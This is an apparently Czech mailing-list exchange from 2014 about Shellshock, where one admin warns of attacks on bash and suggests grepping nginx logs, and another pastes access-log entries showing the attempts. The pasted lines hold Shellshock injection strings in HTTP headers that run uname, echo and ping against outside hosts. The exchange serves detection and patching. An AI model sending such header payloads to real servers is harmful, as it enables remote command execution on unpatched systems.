-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Ahoj Petre, diky.
Nasel jsou zatim pouze toto :)
/var/log/nginx/access.log:54.251.83.67 - - [29/Sep/2014:07:26:24 +0200] "GET / HTTP/1.1" 200 612 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a" /var/log/nginx/access.log-20140925.gz:209.126.230.72 - - [24/Sep/2014:23:47:52 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping - -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" /var/log/nginx/access.log-20140926.gz:209.126.230.72 - - [25/Sep/2014:03:52:42 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping - -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" /var/log/nginx/access.log-20140926.gz:89.207.135.125 - - [25/Sep/2014:14:38:39 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 162 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" /var/log/nginx/access.log-20140926.gz:198.20.69.74 - - [26/Sep/2014:01:47:24 +0200] "GET / HTTP/1.1" 200 612 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném proudu, podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.